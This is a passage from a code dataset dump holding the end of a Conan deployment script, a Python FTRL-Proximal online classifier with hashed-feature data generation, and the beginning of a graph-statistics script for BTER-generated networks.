copy = input_dict.copy()
copy.update(update)
return copy
@contextmanager
def temporary_environment(environment):
"""Run child code inside temporarily set environment variables."""
try:
backup = os.environ.copy()
os.environ = environment
yield os.environ
finally:
os.environ = backup
@contextmanager
def captured_messages(util):
"""Capture printed messages."""
old_buffer = util.PRINT_MESSAGES_TO
try:
util.PRINT_MESSAGES_TO = StringIO()
yield util.PRINT_MESSAGES_TO
finally:
util.PRINT_MESSAGES_TO = old_buffer
# suppress(too-many-arguments)
def run_deploy(cont, util, pkg_name, version, block):
"""Run the deploy step and set CONAN_VERSION_OVERRIDE to version."""
update = {"CONAN_VERSION_OVERRIDE": version} if version else {}
upload_desc = "{pkg}/{version}@{block}".format(pkg=pkg_name,
version=version,
block=block)
with util.Task("""Deploying {} to conan""".format(upload_desc)):
with temporary_environment(updated_dict(os.environ, update)):
util.execute(cont,
util.running_output,
"conan",
"export",
block)
util.execute(cont,
util.running_output,
"conan",
"upload",
upload_desc)
def run(cont, util, shell, argv=None):
"""Copy directories into place to prepare for publishing conan project."""
parser = argparse.ArgumentParser("""Conan deployment""")
parser.add_argument("--package-name",
help="""Package name""",
type=str,
required=True)
result = parser.parse_args(argv)
assert os.path.exists("conan_keys")
with open("conan_keys", "r") as conan_keys_file:
conan_keys = json.loads(conan_keys_file.read())
username = conan_keys["username"]
password = conan_keys["password"]
os.environ["REPO_API_KEY"] = str(conan_keys["repo_api_key"])
cont.fetch_and_import("deploy/project/deploy.py").run(cont,
util,
shell)
block = "{user}/{pkg}".format(user=username,
pkg=result.package_name)
cont.fetch_and_import("deploy/project/deploy.py").run(cont,
util,
shell,
["--bump-version-on",
"conanfile.py"])
with _get_python_container(cont, util, shell).activated(util):
with captured_messages(util) as version_stream:
util.execute(cont,
util.running_output,
"python",
"-c",
"import conanfile; "
"print(conanfile.VERSION)")
version_stream.seek(0)
version = str(version_stream.read()).strip()
with util.Task("""Logging in as {}""".format(username)):
util.execute(cont,
util.running_output,
"conan",
"user",
username,
"-p",
password)
run_deploy(cont,
util,
result.package_name,
"master",
block)
run_deploy(cont,
util,
result.package_name,
version,
block)
|
mit
| -7,925,659,697,915,147,000
| 33.083916
| 79
| 0.489536
| false
| 4.878879
| false
| false
| false
|
fmfn/FTRLp
|
FTRLp.py
|
1
|
31553
|
from __future__ import division
from __future__ import print_function
"""
------------ Follow The Regularized Leader - Proximal ------------
FTRL-P is an online classification algorithm that combines both L1 and L2
norms, particularly suited for large data sets with extremely high dimensionality.
This implementation follow the algorithm by H. B. McMahan et. al. It minimizes
the LogLoss function iteratively with a combination of L2 and L1 (centralized
at the current point) norms and adaptive, per coordinate learning rates.
This algorithm is efficient at obtaining sparsity and has proven to perform
very well in massive Click-Through-Rate prediction tasks.
This module contains two objects...
References:
* Follow-the-Regularized-Leader and Mirror Descent: Equivalent Theorems
and L1 Regularization, H. Brendan McMahan
* Ad Click Prediction: a View from the Trenches, H. Brendan McMahan et. al.
"""
from math import log, exp, fabs, sqrt
from csv import DictReader
from datetime import datetime
from random import random
from hashlib import sha256
def log_loss(y, p):
"""
--- Log_loss computing function
A function to compute the log loss of a predicted probability p given
a true target y.
:param y: True target value
:param p: Predicted probability
:return: Log loss.
"""
p = max(min(p, 1. - 10e-15), 10e-15)
return -log(p) if y == 1 else -log(1. - p)
def to_hash(value):
"""
Hashes values for hashing trick.
Treats numbers as strings.
    :param value: Any value that should be treated as a category.
:return: hashed value.
"""
if not isinstance(value, bytes):
value = str(value).encode('utf-8')
hex_value = sha256(value).hexdigest()
int_hash = int(hex_value, 16)
return int_hash
class DataGen(object):
"""
DataGen is an object to generate the data that is fed to the
classifier.
It reads the data file one row at a time, hashes it
and returns it.
The names and types of columns must be passed to it, so that categorical,
target, numerical and identification columns can be treated differently.
It also keeps track of the name and position of all features to allow
the classifier to keep track of the coefficients by feature.
"""
def __init__(self, max_features, target, descriptive=(), categorical=(), numerical=None, transformation=None):
"""
The object initialized with the maximum number of features to be generated and the
names of the appropriate columns.
Categorical columns are hashed while numerical columns are kept as is, therefore
care must be taken with normalization and pre processing.
:param max_features: The maximum number of features to generate. It includes all
numerical and categorical features. Must be greater than the
number of numerical features.
:param target: The name of the target variable. It must be a binary variable taking
values in {0, 1}.
:param descriptive: Descriptive features that are used to identify the samples but
are not to be used for modelling, such as IDs, public
identifiers, etc.
:param categorical: Categorical variable to be hashed.
        :param numerical: Numerical variable. These will not be hashed but will be used in
                          the modelling phase.
        :param transformation: Optional dictionary mapping a new feature name to a
                               (source column name, function) tuple; the function is
                               applied to the source column value on the fly.
        """
# --- Instance variables.
# Instance variables are created for columns names and the number of numerical
# columns in addition to all of the object's parameters.
# Stores the maximum number of features to generate while hashing
self.mf = max_features
# Stores the name of the target variable.
self.y = target
# Stores a list with the names of all descriptive variables.
self.ids = descriptive
# Stores a list with the names of all categorical variables.
self.cat = categorical
# Stores a list with the names of all numerical variables.
self.num = numerical
# Stores a dictionary with the names of numerical variable to apply a given function to.
self.tra = transformation if transformation is not None else {}
# Dictionary to store names
self.names = {}
# --- Numerical features
# Numerical features are indexed in sorted order. The number
# of features is determined by the variable size. The value
# of each feature is just the value read from the file. Start
# by defining what is numeric. If the user does not pass the
# names of all numerical features, the code will assume
# every columns that is not id, target or categorical is
# numeric and find their name when the training process begin.
if self.num is not None:
self.num_cols = sorted(self.num)
# Store the names in our names dictionary
self.names.update(dict(zip(self.num_cols, range(len(self.num_cols)))))
else:
self.num_cols = []
# --- Something to build model on
# Make sure the user passed some information on the columns to
# be used to build the model upon
assert len(self.cat) + len(self.num_cols) > 0, 'At least one categorical or numerical feature must ' \
'be provided.'
def _fetch(self, path):
"""
This method is the core reason this object exists. It is a python generator
that hashes categorical variables, combines them to numerical variables and
yields all the relevant information, row by row.
:param path: Path of the data file to be read.
:return: YIELDS the current row, ID information, feature values and the target value.
even if the file does not contain a target field it returns a target value
of zero anyway.
"""
for t, row in enumerate(DictReader(open(path))):
# --- Variables
# t: The current line being read
# row: All the values in this line
# --- Ids and other descriptive fields
# Process any descriptive fields and put it all in a list.
ids = []
for ID in self.ids:
ids.append(row[ID])
del row[ID]
# --- Target
# Process target and delete its entry from row if it exists
# otherwise just ignore and move along
y = 0.
if self.y in row:
if row[self.y] == '1':
y = 1.
del row[self.y]
# --- Features
# Initialize an empty dictionary to hold feature
# indexes and their corresponding values.
#
x = {}
# --- Enough features?
# For the very first row make sure we have enough features (max features
# is large enough) by computing the number of numerical columns and
# asserting that the maximum number of features is larger than it.
if t == 0:
# --- Hash size
# Computes a constant to add to hash index, it dictates the
# number of features that will not be hashed
num_size = len(self.num_cols)
size = num_size + len(self.tra)
# Make sure there is enough space for hashing
assert self.mf > size, 'Not enough dimensions to fit all features.'
# --- Numerical Variables
# Now we loop over numerical variables
for i, key in enumerate(self.num_cols):
# --- No transformation
# If no transformation is necessary, just store the actual value
# of the variable.
x[i] = float(row[key])
# --- Transformations
# Create on the fly transformed variables. The user passes a map of the
# name of the new variable to a tuple containing the name of the original
# variable to be transformed and the function to be applied to it.
# Once completed the new name is appended to the names dictionary with its
# corresponding index.#
for i, key in enumerate(self.tra):
# Start by addition to the data array x the new transformed values
# by looping over new_features and applying the transformation to the
# desired old feature.
x[num_size + i] = self.tra[key][1](row[self.tra[key][0]])
# Create a key in names dictionary with the new name and its
# corresponding index.
self.names[key] = num_size + i
# --- Categorical features
# Categorical features are hashed. For each different kind a
# hashed index is created and a value of 1 is 'stored' in that
# position.
for key in self.cat:
# --- Category
# Get the categorial variable from row
value = row[key]
# --- Hash
# One-hot encode everything with hash trick
index = to_hash(key + '_' + value) % (self.mf - size) + size
x[index] = 1.
# --- Save Name
# Save the name and index to the names dictionary if its a new feature
# AND if there's still enough space.
if key + '_' + value not in self.names and len(self.names) < self.mf:
self.names[key + '_' + value] = index
# Yield everything.
yield t, ids, x, y
def train(self, path):
"""
The train method is just a wrapper around the _fetch generator to comply
with sklearn's API.
:param path: The path for the training file.
:return: YIELDS row, features, target value
"""
# --- Generates train data
# This is just a generator on top of the basic _fetch. If this was python 3 I
# could use 'yield from', but I don't think this syntax exists in python 2.7,
# so I opted to use the explicit, less pythonic way.
for t, ids, x, y in self._fetch(path):
# --- Variables
# t: Current row
# ids: List of ID information
# x: Feature values
# y: Target values
yield t, x, y
def test(self, path):
"""
The test method is just a wrapper around the _fetch generator to comply
with sklearn's API.
:param path: The path for the test file.
:return: YIELDS row, features
"""
# --- Generates test data
# This is just a generator on top of the basic _fetch. If this was python 3 I
# could use 'yield from', but I don't think this syntax exists in python 2.7,
# so I opted to use the explicit, less pythonic way.
for t, ids, x, y in self._fetch(path):
# --- Variables
# t: Current row
# ids: List of ID information
# x: Feature values
# y: Target values
yield t, x
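# A hedged, illustrative sketch (not part of the original module) of how a
# DataGen is typically configured. The column names and feature budget are
# made-up placeholders; the `transformation` entry follows the format used by
# _fetch above: new feature name -> (source column, function to apply).
def _example_data_gen():
    return DataGen(max_features=2 ** 20,
                   target='click',
                   descriptive=('id',),
                   categorical=('site', 'device', 'banner_pos'),
                   numerical=('price',),
                   transformation={'log_price': ('price',
                                                 lambda v: log(float(v) + 1.))})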
class FTRLP(object):
"""
--- Follow The Regularized Leader - Proximal ---
FTRL-P is an online classification algorithm that combines both L1 and L2
norms, particularly suited for large data sets with extremely high dimensionality.
This implementation follow the algorithm by H. B. McMahan et. al. It minimizes
the LogLoss function iteratively with a combination of L2 and L1 (centralized
at the current point) norms and adaptive, per coordinate learning rates.
This algorithm is efficient at obtaining sparsity and has proven to perform
very well in massive Click-Through-Rate prediction tasks.
References:
* Follow-the-Regularized-Leader and Mirror Descent: Equivalent Theorems
and L1 Regularization, H. Brendan McMahan
* Ad Click Prediction: a View from the Trenches, H. Brendan McMahan et. al.
"""
def __init__(self, alpha=1, beta=1, l1=1, l2=1, subsample=1, epochs=1, rate=0):
"""
Initializes the classifier's learning rate constants alpha and beta,
the regularization constants L1 and L2, and the maximum number of
features (limiting factor of the hash function).
The per feature learning rate is given by:
            eta = alpha / ( beta + sqrt( sum g**2 ) )
:param alpha: Learning rate's proportionality constant.
:param beta: Learning rate's parameter.
:param l1: l1 regularization constant.
:param l2: l2 regularization constant.
:return:
"""
# --- Classifier Parameters
# The FTRLP algorithm has four free parameters that can be tuned as pleased.
# Learning rate's proportionality constant.
self.alpha = alpha
# Learning rate's parameter.
self.beta = beta
# L1 regularization constant.
self.l1 = l1
# L2 regularization constant.
self.l2 = l2
# --- Log likelihood
# Stores the log likelihood during the whole
# fitting process.
self.log_likelihood_ = 0
self.loss = []
# --- Weight parameters.
# Lists and dictionaries to hold the weights. Initiate
# the weight vector z and learning rate n as None so that
# when self.train is called multiple times it will not
# overwrite the stored values. This essentially allows epoch
# training to take place, albeit a little bit ugly.
self.z = None
self.n = None
# The weight vector used for prediction is constructed on the fly
# and, in order to keep the memory cost low, it is a dictionary
# that receives values and keys as needed.
# --- Coefficients
# Lists to store the coefficients and their corresponding names.
# Initialized to None and constructed once the training method is
# completed. In case of multiple epochs, these quantities will be
# computed multiple times.
self.coef_ = {}
self.cname = None
# --- Target Ratio
        # Store the ratio of each class of a binary target variable to use
# it to make weighted discrete label predictions.
self.target_ratio = 0.
# --- Printing Rate
# Number of samples to train and predict on before printing
# current status
self.rate = rate
# --- Subsample
        # While online methods can't be shuffled, combining subsampling of
# the training set with multiple epoch training gives similar results.
self.subsample = subsample
# --- Epochs
# something...
self.epochs = epochs
# --- Flag for partial fit
# Keeps a flag to allow the user to train multiple times
# without overwriting the object.
self.fit_flag = False
def _build_p(self, data_gen, path):
# Maybe is worth migrating the weight construction algorithm
# to here, I think it could clean up the code a little a bit
# in both train and predict methods.
pass
def _clear_params(self):
"""
If the fit method is called multiple times, all trained parameters
must be cleared allowing for a fresh start. This function simply
resets everything back to square one.
:return: Nothing
"""
# All models parameters are set to their original value (see
# __init__ description
self.log_likelihood_ = 0
self.loss = []
self.z = None
self.n = None
self.coef_ = {}
self.cname = None
def get_params(self, deep=True):
"""
        A function to return a map of parameter names and values.
        :param deep: Present for scikit-learn API compatibility; not used here.
:return: Dictionary mapping parameters names to their values
"""
ps = {'alpha': self.alpha,
'beta': self.beta,
'l1': self.l1,
'l2': self.l2,
'subsample': self.subsample,
'epochs': self.epochs,
'rate': self.rate}
return ps
def set_params(self, **params):
"""
        Set object attributes from keyword arguments.
        :param params: Mapping of parameter names to new values.
        :return: Nothing
"""
        for key, value in params.items():
setattr(self, key, value)
def _update(self, y, p, x, w):
"""
# --- Update weight vector and learning rate.
# With the prediction round completed we can proceed to
# updating the weight vector z and the learning rate eta
# based on the last observed label.
# To do so we will use the computed probability and target
# value to find the gradient loss and continue from there.
# The gradient for the log likelihood for round t can easily
# be shown to be:
# g_i = (p - y) * x_i, (round t)
# The remaining quantities are updated according to the
# minimization procedure outlined in [2].
:param y: True target variable
:param p: Predicted probability for the current sample
:param x: Non zero feature values
:param w: Weights
:return: Nothing
"""
# --- Update loop
# Loop over all relevant indexes and update all values
# accordingly.
for i in x.keys():
# --- Compute Gradient of LogLoss
g = (p - y) * x[i]
# --- Update constant sigma
# Note that this upgrade is equivalent to
# (eta_(t, i))^-1 - (eta_(t - 1, i))^-1
# as discussed in [2].
s = (sqrt(self.n[i] + g * g) - sqrt(self.n[i])) / self.alpha
# --- Increment changes
# Finally, increment the appropriate changes to weights and
# learning rate vectors.
self.z[i] += g - s * w[i]
self.n[i] += g * g
def _train(self, data_gen, path):
"""
--- Fitting method ---
Online fitting method. It takes one sample at a time, builds
the weight vector on the fly and computes the dot product of
weight vector and values and a prediction is made.
Then the true label of the target variable is observed and the
loss is added.
Once this is completed the weights are updated based on the
previously observed values.
:param data_gen: An instance of the DataGen class
:param path: The path to the training set
:return:
"""
# Best way? Proper coding means no access to protected members...
if self.z is None and self.n is None:
self.z = [0.] * data_gen.mf
self.n = [0.] * data_gen.mf
# --- Start the clock!
start_time = datetime.now()
for t, x, y in data_gen.train(path):
# --- Variables
# t: Current row
# x: Feature values
# y: Target values
# --- Target Ratio Update
# Rolling calculation of the target average
self.target_ratio = (1.0 * (t * self.target_ratio + y)) / (t + 1)
# --- Stochastic sample selection
            # Choose whether or not to use a sample at
            # training time. Since online methods can't
            # really be shuffled, we can use this combined
# with multiple epochs to create heterogeneity.
            # The rate == 0 check guards against a modulo-by-zero when no
            # printing rate has been set (the default).
            if random() > self.subsample and (self.rate == 0 or
                                              (t + 1) % self.rate != 0):
continue
# --- Dot product init.
# The dot product is computed as the weights are calculated,
# here it is initiated at zero.
wtx = 0
# --- Real time weights
# Initialize an empty dictionary to hold the weights
w = {}
# --- Weights and prediction
# Computes the weights for numerical features using the
# indexes and values present in the x dictionary. And make
# a prediction.
# This first loop build the weight vector on the fly. Since
# we expect most weights to be zero, the weight vector can
# be constructed in real time. Furthermore, there is no
# reason to store it, neither to clear it, since at each
# iteration only the relevant indexes are populated and used.
for indx in x.keys():
# --- Loop over indicator I
# x.keys() carries all the indexes of the feature
# vector with non-zero entries. Therefore, we can
# simply loop over it since anything else will not
# contribute to the dot product w.x, and, consequently
# to the prediction.
if fabs(self.z[indx]) <= self.l1:
# --- L1 regularization
# If the condition on the absolute value of the
# vector Z is not met, the weight coefficient is
# set exactly to zero.
w[indx] = 0
else:
# --- Non zero weight
# Provided abs(z_i) is large enough, the weight w_i
# is computed. First, the sign of z_i is determined.
sign = 1. if self.z[indx] >= 0 else -1.
                    # Then the value of w_i is computed and stored. Note
# that any previous value w_i may have had will be
# overwritten here. Which is fine since it will not
# be used anywhere outside this (t) loop.
w[indx] = - (self.z[indx] - sign * self.l1) / \
(self.l2 + (self.beta + sqrt(self.n[indx])) / self.alpha)
# --- Update dot product
# Once the value of w_i is computed we can use to compute
# the i-th contribution to the dot product w.x. Which, here
# is being done inside the index loop, compute only coordinates
# that could possible be non-zero.
wtx += w[indx] * x[indx]
# --- Make a prediction
# With the w.x dot product in hand we can compute the output
# probability by putting wtx through the sigmoid function.
# We limit wtx value to lie in the [-35, 35] interval to
# avoid round off errors.
p = 1. / (1. + exp(-max(min(wtx, 35.), -35.)))
# --- Update the loss function
# Now we look at the target value and use it, together with the
# output probability that was just computed to find the loss we
# suffer this round.
self.log_likelihood_ += log_loss(y, p)
# --- Verbose section
if (self.rate > 0) and (t + 1) % self.rate == 0:
# Append to the loss list.
self.loss.append(self.log_likelihood_)
# Print all the current information
print('Training Samples: {0:9} | '
'Loss: {1:11.2f} | '
'Time taken: {2:4} seconds'.format(t + 1,
self.log_likelihood_,
(datetime.now() - start_time).seconds))
# --- Update weights
# Finally, we now how well we did this round and move on to
# updating the weights based on the current status of our
# knowledge.
self._update(y, p, x, w)
# --- Coefficient names and indexes
# Bind the feature names to their corresponding coefficient obtained from
# the regression.
self.coef_.update(dict([[key, self.z[data_gen.names[key]]] for key in data_gen.names.keys()]))
def fit(self, data_gen, path):
"""
Epoch wrapper around the main fitting method _train
:param data_gen: An instance of the DataGen class
:param path: The path to the training set
:return:
"""
# --- Check fit flag
# Make sure the fit methods is starting from a clean slate by
# checking the fit_flag variable and calling the _clear_params
# function if necessary.
# While always calling _clear_params would do the job, by setting
# this flag we are also able to call fit multiple times WITHOUT
# clearing all parameters --- See partial_fit.
if self.fit_flag:
self._clear_params()
# --- Start the clock!
total_time = datetime.now()
# Train epochs
for epoch in range(self.epochs):
# --- Start the clock!
epoch_time = datetime.now()
# --- Verbose
# Print epoch if verbose is turned on
if self.rate > 0:
print('TRAINING EPOCH: {0:2}'.format(epoch + 1))
print('-' * 18)
self._train(data_gen, path)
# --- Verbose
# Print time taken if verbose is turned on
if self.rate > 0:
print('EPOCH {0:2} FINISHED IN {1} seconds'.format(epoch + 1,
(datetime.now() - epoch_time).seconds))
print()
# --- Verbose
# Print fit information if verbose is on
if self.rate > 0:
print(' --- TRAINING FINISHED IN '
'{0} SECONDS WITH LOSS {1:.2f} ---'.format((datetime.now() - total_time).seconds,
self.log_likelihood_))
print()
# --- Fit Flag
# Set fit_flag to true. If fit is called again this is will trigger
# the call of _clean_params. See partial_fit for different usage.
self.fit_flag = True
def partial_fit(self, data_gen, path):
"""
Simple solution to allow multiple fit calls without overwriting
        previously calculated weights, losses, etc.
:param data_gen: An instance of the DataGen class
:param path: The path to the training set
:return:
"""
# --- Fit Flag
        # Start by resetting fit_flag to false to "trick"
# the fit method into keep training without overwriting
# previously calculated quantities.
self.fit_flag = False
# --- Fit
# Call the fit method and proceed as normal
self.fit(data_gen, path)
def predict_proba(self, data_gen, path):
"""
--- Predicting Probabilities method ---
        Computes the predicted probability for every sample in the test set.
:param data_gen: An instance of the DataGen class
:param path: The path to the test set
:return: A list with predicted probabilities
"""
# --- Results
# Initialize an empty list to hold predicted values.
result = []
# --- Start the clock!
start_time = datetime.now()
for t, x in data_gen.test(path):
# --- Variables
# t: Current row
# x: Feature values
# --- Dot product init.
# The dot product is computed as the weights are calculated,
# here it is initiated at zero.
wtx = 0
# --- Real time weights
# Initialize an empty dictionary to hold the weights
w = {}
# --- Weights and prediction
# Computes the weights for numerical features using the
# indexes and values present in the x dictionary. And make
# a prediction.
# This first loop build the weight vector on the fly. Since
# we expect most weights to be zero, the weight vector can
# be constructed in real time. Furthermore, there is no
# reason to store it, neither to clear it, since at each
# iteration only the relevant indexes are populated and used.
for indx in x.keys():
# --- Loop over indicator I
# x.keys() carries all the indexes of the feature
# vector with non-zero entries. Therefore, we can
# simply loop over it since anything else will not
# contribute to the dot product w.x, and, consequently
# to the prediction.
if fabs(self.z[indx]) <= self.l1:
# --- L1 regularization
# If the condition on the absolute value of the
# vector Z is not met, the weight coefficient is
# set exactly to zero.
w[indx] = 0
else:
# --- Non zero weight
# Provided abs(z_i) is large enough, the weight w_i
# is computed. First, the sign of z_i is determined.
sign = 1. if self.z[indx] >= 0 else -1.
                    # Then the value of w_i is computed and stored. Note
# that any previous value w_i may have had will be
# overwritten here. Which is fine since it will not
# be used anywhere outside this (t) loop.
w[indx] = - (self.z[indx] - sign * self.l1) / \
(self.l2 + (self.beta + sqrt(self.n[indx])) / self.alpha)
# --- Update dot product
# Once the value of w_i is computed we can use to compute
# the i-th contribution to the dot product w.x. Which, here
# is being done inside the index loop, compute only coordinates
# that could possible be non-zero.
wtx += w[indx] * x[indx]
# --- Make a prediction
# With the w.x dot product in hand we can compute the output
# probability by putting wTx through the sigmoid function.
# We limit wTx value to lie in the [-35, 35] interval to
# avoid round off errors.
result.append(1. / (1. + exp(-max(min(wtx, 35.), -35.))))
            # --- Verbose section
            # Guard against rate == 0 (the default) to avoid a modulo-by-zero.
            if self.rate > 0 and (t + 1) % self.rate == 0:
# print some stuff
print('Test Samples: {0:8} | '
'Time taken: {1:3} seconds'.format(t + 1,
(datetime.now() - start_time).seconds))
# All done, return the predictions!
return result
def predict(self, data_gen, path):
"""
--- Predicting method ---
        Computes binary class labels by thresholding the predicted probabilities.
:param data_gen: An instance of the DataGen class
:param path: The path to the test set
        :return: A list with predicted binary class labels
"""
# --- Probabilities
# Compute probabilities by invoking the predict_proba method
probs = self.predict_proba(data_gen, path)
# --- Return
# Return binary labels. The threshold is set using the mean value of the
# target variable.
return map(lambda x: 0 if x <= self.target_ratio else 1, probs)
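# A hedged, end-to-end usage sketch (not part of the original module): train an
# FTRLP model on a training CSV and score a test CSV. The file paths and the
# DataGen configuration are placeholders mirroring the illustrative example
# above; real column names depend on the data set at hand.
def _example_pipeline(train_path='train.csv', test_path='test.csv'):
    data_gen = DataGen(max_features=2 ** 20,
                       target='click',
                       descriptive=('id',),
                       categorical=('site', 'device', 'banner_pos'),
                       numerical=('price',))
    clf = FTRLP(alpha=0.1, beta=1., l1=1., l2=1.,
                subsample=1, epochs=2, rate=100000)
    clf.fit(data_gen, train_path)
    return clf.predict_proba(data_gen, test_path)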
|
mit
| -5,593,943,148,002,153,000
| 37.527473
| 114
| 0.565461
| false
| 4.608969
| false
| false
| false
|
abitofalchemy/hrg_nets
|
bters.py
|
1
|
13299
|
import shelve
import networkx as nx
import pandas as pd
import numpy as np
import math
import os
import sys
import re
import argparse
import traceback
import net_metrics as metrics
from glob import glob
__version__ = "0.1.0"
__author__ = ['Salvador Aguinaga']
# alchemee analyze the BTER generated graphs
def get_basic_stats(grphs,gen_mod, name):
df = pd.DataFrame()
for g in grphs:
tdf = [pd.Series(g.degree().values()).mean(), pd.Series(nx.clustering(g).values()).mean()]
df = df.append([tdf])
df.columns=['avg_k','avg_cc']
  # Return the basic stats as a CSV-formatted string.
  return df.to_csv()
def get_degree_dist(grphs,gen_mod, name):
mf = pd.DataFrame()
for g in grphs:
d = g.degree()
df = pd.DataFrame.from_dict(d.items())
gb = df.groupby([1]).count()
mf = pd.concat([mf, gb], axis=1)
mf['pk'] = mf.mean(axis=1)/float(g.number_of_nodes())
mf['k'] = mf.index.values
#print mf
out_tsv = '../Results/{}_{}_degree.tsv'.format(name,gen_mod)
mf[['k','pk']].to_csv(out_tsv, sep='\t', index=False, header=True, mode="w")
def get_clust_coeff(grphs,gen_mod, name):
mf = pd.DataFrame()
for g in grphs:
df = pd.DataFrame.from_dict(g.degree().items())
df.columns=['v','k']
cf = pd.DataFrame.from_dict(nx.clustering(g).items())
cf.columns=['v','cc']
df = pd.merge(df,cf,on='v')
mf = pd.concat([mf, df])
gb = mf.groupby(['k']).mean()
out_tsv = "../Results/{}_{}_clustering.tsv".format(name,gen_mod)
gb[['cc']].to_csv(out_tsv, sep="\t", header=True, index=True)
def degree_prob_distributuion(orig_g_M, otherModel_M, name):
print 'draw degree probability distribution'
if orig_g_M is not None:
dorig = pd.DataFrame()
for g in orig_g_M:
d = g.degree()
df = pd.DataFrame.from_dict(d.items())
gb = df.groupby(by=[1])
dorig = pd.concat([dorig, gb.count()], axis=1) # Appends to bottom new DFs
print "---<>--- orig", name
if not dorig.empty :
zz = len(dorig.mean(axis=1).values)
sa = int(math.ceil(zz/75))
if sa == 0: sa=1
for x in range(0, len(dorig.mean(axis=1).values), sa):
print "(" + str(dorig.mean(axis=1).index[x]) + ", " + str(dorig.mean(axis=1).values[x]) + ")"
if otherModel_M is not None:
dorig = pd.DataFrame()
for g in otherModel_M:
d = g.degree()
df = pd.DataFrame.from_dict(d.items())
gb = df.groupby(by=[1])
dorig = pd.concat([dorig, gb.count()], axis=1) # Appends to bottom new DFs
print "---<>--- otherModel_M", name
if not dorig.empty :
zz = len(dorig.mean(axis=1).values)
sa = int(math.ceil(zz/float(75)))
for x in range(0, len(dorig.mean(axis=1).values), sa):
print "(" + str(dorig.mean(axis=1).index[x]) + ", " + str(dorig.mean(axis=1).values[x]) + ")"
def network_value_distribution(orig_g_M, otherModel_M, name):
eig_cents = [nx.eigenvector_centrality_numpy(g) for g in orig_g_M] # nodes with eigencentrality
net_vals = []
for cntr in eig_cents:
net_vals.append(sorted(cntr.values(), reverse=True))
df = pd.DataFrame(net_vals)
print "orig"
l = list(df.mean())
zz = float(len(l))
if not zz == 0:
sa = int(math.ceil(zz/75))
for i in range(0, len(l), sa):
print "(" + str(i) + "," + str(l[i]) + ")"
eig_cents = [nx.eigenvector_centrality_numpy(g) for g in otherModel_M] # nodes with eigencentrality
net_vals = []
for cntr in eig_cents:
net_vals.append(sorted(cntr.values(), reverse=True))
df = pd.DataFrame(net_vals)
print "other model"
l = list(df.mean())
zz = float(len(l))
if not zz == 0:
sa = int(math.ceil(zz/75))
for i in range(0, len(l), sa):
print "(" + str(i) + "," + str(l[i]) + ")"
def hop_plots(orig_g_M, otherModel_M, name):
m_hops_ar = []
for g in orig_g_M:
c = metrics.get_graph_hops(g, 20)
d = dict(c)
m_hops_ar.append(d.values())
df = pd.DataFrame(m_hops_ar)
print '-- orig graph --\n'
l = list(df.mean())
zz = float(len(l))
if not zz == 0:
sa = int(math.ceil(zz/float(75)))
for i in range(0, len(l), sa):
print "(" + str(i) + "," + str(l[i]) + ")"
print '-- the other model --\n'
m_hops_ar = []
for g in otherModel_M:
c = metrics.get_graph_hops(g, 20)
d = dict(c)
m_hops_ar.append(d.values())
break
df = pd.DataFrame(m_hops_ar)
l = list(df.mean())
zz = float(len(l))
if not zz == 0:
sa = int(math.ceil(zz/float(75)))
for i in range(0, len(l), sa):
print "(" + str(i) + "," + str(l[i]) + ")"
def clustering_coefficients(orig_g_M, otherModel_M, name):
  if len(orig_g_M) != 0:
dorig = pd.DataFrame()
for g in orig_g_M:
degdf = pd.DataFrame.from_dict(g.degree().items())
ccldf = pd.DataFrame.from_dict(nx.clustering(g).items())
dat = np.array([degdf[0], degdf[1], ccldf[1]])
df = pd.DataFrame(np.transpose(dat))
df = df.astype(float)
df.columns = ['v', 'k', 'cc']
dorig = pd.concat([dorig, df]) # Appends to bottom new DFs
print "orig"
gb = dorig.groupby(['k'])
zz = len(gb['cc'].mean().values)
sa = int(math.ceil(zz/75))
if sa == 0: sa=1
for x in range(0, len(gb['cc'].mean().values), sa):
print "(" + str(gb['cc'].mean().index[x]) + ", " + str(gb['cc'].mean().values[x]) + ")"
  if len(otherModel_M) != 0:
dorig = pd.DataFrame()
for g in otherModel_M:
degdf = pd.DataFrame.from_dict(g.degree().items())
ccldf = pd.DataFrame.from_dict(nx.clustering(g).items())
dat = np.array([degdf[0], degdf[1], ccldf[1]])
df = pd.DataFrame(np.transpose(dat))
df = df.astype(float)
df.columns = ['v', 'k', 'cc']
dorig = pd.concat([dorig, df]) # Appends to bottom new DFs
print "otherModel_M"
gb = dorig.groupby(['k'])
zz = len(gb['cc'].mean().values)
sa = int(math.ceil(zz/75))
if sa == 0: sa=1
for x in range(0, len(gb['cc'].mean().values), sa):
print "(" + str(gb['cc'].mean().index[x]) + ", " + str(gb['cc'].mean().values[x]) + ")"
return
def assortativity(orig_g_M, otherModel_M, name):
  if len(orig_g_M) != 0:
dorig = pd.DataFrame()
for g in orig_g_M:
kcdf = pd.DataFrame.from_dict(nx.average_neighbor_degree(g).items())
kcdf['k'] = g.degree().values()
dorig = pd.concat([dorig, kcdf])
print "orig"
gb = dorig.groupby(['k'])
zz = len(gb[1].mean().values)
sa = int(math.ceil(zz/75))
if sa == 0: sa=1
for x in range(0, len(gb[1].mean().values), sa):
print "(" + str(gb.mean().index[x]) + ", " + str(gb[1].mean().values[x]) + ")"
  if len(otherModel_M) != 0:
dorig = pd.DataFrame()
for g in otherModel_M:
kcdf = pd.DataFrame.from_dict(nx.average_neighbor_degree(g).items())
kcdf['k'] = g.degree().values()
dorig = pd.concat([dorig, kcdf])
print "the other model ", name
gb = dorig.groupby(['k'])
zz = len(gb[1].mean().values)
sa = int(math.ceil(zz/75))
if sa == 0: sa=1
for x in range(0, len(gb[1].mean().values), sa):
print "(" + str(gb.mean().index[x]) + ", " + str(gb[1].mean().values[x]) + ")"
return
def kcore_decomposition(orig_g_M, otherModel_M, name):
dorig = pd.DataFrame()
for g in orig_g_M:
g.remove_edges_from(g.selfloop_edges())
d = nx.core_number(g)
df = pd.DataFrame.from_dict(d.items())
df[[0]] = df[[0]].astype(int)
gb = df.groupby(by=[1])
dorig = pd.concat([dorig, gb.count()], axis=1) # Appends to bottom new DFs
print "orig"
if not dorig.empty :
zz = len(dorig.mean(axis=1).values)
sa = int(math.ceil(zz/75))
if sa == 0: sa=1
for x in range(0, len(dorig.mean(axis=1).values), sa):
print "(" + str(dorig.mean(axis=1).index[x]) + ", " + str(dorig.mean(axis=1).values[x]) + ")"
dorig = pd.DataFrame()
for g in otherModel_M:
d = nx.core_number(g)
df = pd.DataFrame.from_dict(d.items())
df[[0]] = df[[0]].astype(int)
gb = df.groupby(by=[1])
dorig = pd.concat([dorig, gb.count()], axis=1) # Appends to bottom new DFs
print "== the other model =="
if not dorig.empty :
zz = len(dorig.mean(axis=1).values)
sa = int(math.ceil(zz/75))
if sa == 0: sa=1
